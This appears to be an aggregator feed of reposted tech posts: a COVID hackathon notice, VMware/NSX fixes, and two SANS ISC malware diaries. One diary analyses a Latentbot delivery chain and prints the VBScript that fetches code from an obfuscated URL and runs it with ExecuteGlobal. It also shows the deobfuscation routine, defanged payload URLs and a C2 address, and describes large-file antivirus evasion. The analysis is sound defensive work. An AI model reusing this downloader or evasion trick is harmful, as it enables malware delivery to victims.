BuildforCOVID19 Global Online Hackathon

This post was originally published on this site

The COVID-19 Global Hackathon is an opportunity for builders to create software solutions that drive social impact with the aim of tackling some of the challenges related to the current coronavirus (COVID-19) pandemic.

We’re encouraging YOU – builders around the world – to #BuildforCOVID19 using technologies of your choice across a range of suggested themes and challenge areas, some of which have been sourced through health partners like the World Health Organization. The hackathon welcomes locally and globally focused solutions and is open to all developers.

AWS is partnering with technology companies like Facebook, Giphy, Microsoft, Pinterest, Slack, TikTok, Twitter, and WeChat to support this hackathon. We will be providing technical mentorship and credits for all participants.

Join BuildforCOVID19 and chat with fellow participants and AWS mentors in the COVID19 Global Hackathon Slack channel.

Jeff;

Very Large Sample as Evasion Technique?, (Thu, Mar 26th)

This post was originally published on this site

Security controls have a major requirement: they can’t (or at least they try to not) interfere with normal operations of the protected system. It is known that antivirus products do not scan very large files (or just the first x bytes) for performance reasons. Can we consider a very big file as a technique to bypass security controls? Yesterday, while hunting, I spotted a very interesting malware sample. The malicious PE file was delivered via multiple stages but the final dropped file was large… very large!

It started with a classic phishing email containing a shortened URL:

hxxp://bit[.]ly/2WFm2wY

(Tip: Not many people are aware that if you add a ‘+’ sign at the end of a bit.ly URL, you won’t be redirected automatically to the real URL but a page with the link will be returned instead. This can help you to decide if the shortened URL is malicious or not.)

This URL redirected to a second shortener service:

hxxps://rebrand[.]ly/9zcj74uFAT039

Finally, the real URL was visited:

hxxps://cld[.]pt/dl/download/6812fec0-88b6-4e41-9eb1-e5cb06be83e0/sapotransfer-5a1a0746e3e7ePG/ER-3939874-FT.zip?download=true

The ZIP archive (SHA256:7dc6b78fac829e25232fa5fa885464d25bdef45fa577d10f3e73fe393e1c2c19) contains a VBScript file ‘ER-3939874-FT.vbs’ (SHA256:494b9fc1957434ac5626d5fa17189db09f1acea00c856caf107d7bb22fde5ec5)

A quick analyzis reveals that the code is very simple:

It downloads another piece of code from an URL:

Set Dnlakdnsks = CreateObject("Msxml2.XMLHttp.6.0")
Dnlakdnsks.open "GET", Cfgghhhh("_kkgj1&&gXjkY`e%Zfd&iXn&>D)/_E?Y"), False
Dnlakdnsks.send

And executes it:

Function DJierorpoop(WWWWWw)
  ExecuteGlobal WWWWWw
End Function
DJierorpoop Dnlakdnsks.responseText

The URL (‘_kkgj1&&gXjkY`e%Zfd&iXn&>D)/_E?Y’) is deobfuscated via the following function:

Function Cfgghhhh(G1g)
  For DnnKS = 1 To Len(G1g)
    MDNSLS = Mid(G1g, DnnKS, 1)
    MDNSLS = Chr(Asc(MDNSLS)+ 9)
    SSXSLDKSNS = SSXSLDKSNS + MDNSLS
  Next
  Cfgghhhh = SSXSLDKSNS
End Function

We can simulate it in Python. The string is parsed character by characters, converted to their ASCII value and shifted by 9 positions:

>>> str='_kkgj1&&gXjkY`e%Zfd&iXn&>D)/_E?Y'
>>> out=''
>>> for c in str:
...     out = out + chr(ord(c)+9)
...
>>> out
'hxxps://pastebin[.]com/raw/GM28hNHb'

This pastie contains more VBScript code and, once executed, it performs the following actions:

It downloads the next stage from the Internet. The URL is encoded using the same technique (see above) but the characters are shifted by 10 instead of 9. The deobfuscated URL is:

hxxp://160[.]20[.]147[.]130:1948/DNsikidstrou9095.iso

The .iso file is a big chunk of Base64 encoded data. Once decoded, we have a ZIP archive:

remnux@remnux:/malwarezoo$ wget hxxp://160[.]20[.]147[.]130:1948/DNsikidstrou9095.iso
remnux@remnux:/malwarezoo$ base64 -d DNsikidstrou9095.iso | file -
/dev/stdin: Zip archive data, at least v2.0 to extract
remnux@remnux:/malwarezoo$ base64 -d DNsikidstrou9095.iso >DNsikidstrou9095.iso.zip
remnux@remnux:/malwarezoo$ unzip DNsikidstrou9095.iso.zip
Archive:  DNsikidstrou9095.iso.zip
  inflating: DNsikidstrou9095.exe

The PE file (SHA256:a5d786ee432dd486d6773621301997c3143dc47a8525c683ff6281990ff9d14d) is very large:

remnux@remnux:/malwarezoo$ $ ls -lh DNsikidstrou9095.exe
-rw-r--r-- 1 remnux remnux 321M Mar 25 08:20 DNsikidstrou9095.exe

321MB is really big! This trick is very easy to bypass many security controls.  

Often, such files are padded with zeroes to make them bigger but it was not the case this time. Let’s inspect the PE file with PEStudio[1]. The PE file format is quite complex[2] and contains ‘sections’. Sections are ‘areas’ in the file that store different types of data:

.text : contains executable code
.data: contains ‘data’ used by the program

An interesting one is ‘.rsrc’ which contains the ‘resources’. As you can see, this section takes more than 97% of the complete file size:

Resources can be any type of data embedded in the application. Common data are icons, cursors, images, etc.
In our malicious PE, we see three big resources:
 

PEStudio can dump resources to disk. Let’s dump them and see what we have:

remnux@remnux:/malwarezoo$ file  DNsikidstrou9095.*.bmp
DNsikidstrou9095.exe.0.bmp: PC bitmap, Windows 3.x format, 9161 x 7054 x 24
DNsikidstrou9095.exe.1.bmp: PC bitmap, Windows 3.x format, 4267 x 5293 x 24
DNsikidstrou9095.exe.2.bmp: PC bitmap, Windows 3.x format, 4414 x 4959 x 24

Files look very similar:


It does not seem to be computer-generated. I tried to find hidden data in the file, but they look ‘clean’.
The next question is: “Are these sections used by the program?”

They are many tools to play with resources but I like ResourceTuner[3]. The tool is not free but is available in demo mode for 30 days, more than enough to play with it from time to time. The tool allows you to browse resources embedded in a PE file but also to remove them:

The newly generated file has now a size of (only) 8371200 bytes (SHA256:d8d3665affc98cba7942674a51713878b903f8c19034075eb469c3ace3d6aeb6)

Let’s try to execute it again in a sandbox… Great, it worked perfectly!

It’s a variant of the Latentbot[4] that communicates with a C2 @ %%ip:18.231.122.158%%.

[1] https://www.winitor.com
[2] https://docs.microsoft.com/en-us/windows/win32/debug/pe-format
[3] http://www.heaventools.com/resource-tuner.htm?
[4] https://blog.malwarebytes.com/threat-analysis/2017/06/latentbot/

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Configuring Fluentbit on VMware Cloud PKS for…

This post was originally published on this site

A great article describing how to send log from Kubernetes Clusters to a centralized system (here Elasticsearch) on AWS. Monitoring is a key part when we are talking K8s for many reasons that are quite obvious but sometimes forgotten. I will never repeat enough this. Monitoring if the key for happy systems, happy administrators and … Read more Configuring Fluentbit on VMware Cloud PKS for…

Join us for the vSphere 7 Launch Event!

This post was originally published on this site

Join us for the vSphere 7 Launch Event! vSphere 7 is VMware’s biggest set of innovations since the launch of ESXi. With all the excitement around this new generation of vSphere and the app modernization solutions we felt our loyal vSphere users deserve an event just for themselves! With the help of the hosts from … Read more Join us for the vSphere 7 Launch Event!

NSX-T: vCenter and NSX-T Inventory out of Sync (Hosts in vSphere not showing up in NSX-T)

This post was originally published on this site

Summary:
NSX-T loses synch w/ vCenter inventory, but statuses don’t appear to show an issue.  Basically, you add a host to a vCenter cluster, NSX-T bits should start to automatically installing on new host.  Assuming you’ve created a Transport Node Profile and associated w/ the cluster.  The problem is that NSX-T doesn’t see the new host and its link to the compute manager (vCenter) looks fine.

Looks fine, Y U NO WORK!?

So what’s going on here? 
This appears to affect NSX-T 2.5 and 2.5.1.  Cause is unknown.

Workaround:
Restart the cm-inventory service on each NSX-T mgmt/controller node using API or CLI.

Details:
If you were to query the status of the cm-inventory via API or CLI, you could query all 3 manager/controller nodes and get a status of running.  Even if the primary node associated w/ the VIP, if configured, is not necessarily in charge of inventory.  So you could restart the cm-inventory service till you are blue in the face and get nowhere because another node is actually responsible for maintaining the sync. 

Even so, with this particular problem, they would all look healthy.  You’d have to dig into the logs to find the issue.  Thankfully Nathan Pyle from VMware helped us find the issue and provided us w/ a workaround solution until the bug is addressed in a future version.

API Method:
GET /api/v1/node/services/cm-inventory/status
POST /api/v1/node/services/cm-inventory?action=restart

CLI Method:
get service cm-inventory
restart service cm-inventory 

Recent Dridex activity, (Wed, Mar 25th)

This post was originally published on this site

Introduction

This week, I’ve seen a lot of malicious spam (malspam) pushing Dridex malware.  Today’s diary, provides a quick rundown on the types of malspam I’ve seen, and it also covers what an infected Windows host looks like.

The malspam

I’ve seen at least 3 different themes used during the first two days of this week from malspam pushing Dridex.  One was a voicemail-themed email.  Another used a DHL them.  Finally, I saw a FedEx-themed email pushing Dridex.  See the images below for examples.


Shown above:  Malspam using a voicemail theme to push Dridex.


Shown above:  Malspam using a DHL them to push Dridex.


Shown above:  Malspam using a FedEx theme to push Dridex.

An infected Windows host

I infected a lab host using a URL from one of the emails shown above.  See images below for details.


Shown above:  Clicking on the link in the Fedex email.


Shown above:  Extracting a VBS file from the downloaded zip archive.


Shown above:  Running the VBS file drops the initial DLL for Dridex.


Shown above:  Dridex persistence mechanism 1 of 3–a scheduled task.


Shown above:  Dridex persistence mechanism 2 of 3–a regisrty update.


Shown above:  Dridex persistence mechanism 2 of 3–a shorVcut in the Windows startup menu.

Indicators

URLs from the three email examples:

  • hxxp://bienvenidosnewyork[.]com/app.php
  • hxxp://photoflip[.]co[.]in/lndex.php
  • hxxp://everestedu[.]org/lndex.php

Zip archive downloaded from link in one of the malspam:

VBS file extracted from the above zip archive:

Initial Dridex DLL seen after running VBS file:

File hashes for Dridex DLLs made persistent during the infection:

Final notes

Of note, zip archives from links in the emails appeared to be different names/sizes/hashes each time I downloaded one, even if it was from the same link.  Also, when a Dridex-infected Windows host is rebooted, the locations, names, and file hashes of the persistent Dridex DLL files are changed.

Dridex remains a feature of our threat landscape, and it will likely continue to be, at least in the foreseeable future.  Windows 10 hosts that are fully patched and up-to-date have a very low risk of getting infected from Dridex, so it pays to follow best security practices.

Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

vRealize Automation 8.0.1 fails (new install/ after reboot)

This post was originally published on this site

Making a post on this as I experienced this first hand. Issue is, after reboot, some pods will not run. Specifically, vco and pg. This can be verified by executing the following command in one of the node: kubectl get pods –all-namespaces You’ll notice some pods will be CrashLoop state. To resolve, the following KB will help: https://kb.vmware.com/s/article/78235 For new installs: https://kb.vmware.com/s/article/76870 Hope that helps!

Export / Backup VMware NSX ESG/DLR configurations with PowerNSX (part 1, ESGs)

This post was originally published on this site

Why do you need this. If you work with VMware NSX on daily basis you should care about Backup & Restore procedure. According to VMware you can schedule NSX Manager backup and think you are on safe side but restore procedure requires to perform full NSX Manager restore and then… Continue reading

The post Export / Backup VMware NSX ESG/DLR configurations with PowerNSX (part 1, ESGs) appeared first on The Virtualist.

Create NSX-T Edge Cluster – VMware NSX-T Part 18

This post was originally published on this site

NSX-T Edge provides computational power to deliver IP routing and services. We can deploy multiple Edge nodes up to 10 to form an NSX-T Edge cluster. An NSX Edge cluster is a group of homogeneous nodes with common properties that provide high availability for the Edge nodes.. Having an NSX-T edge cluster will ensure that at […]

The post Create NSX-T Edge Cluster – VMware NSX-T Part 18 appeared first on VMware Arena.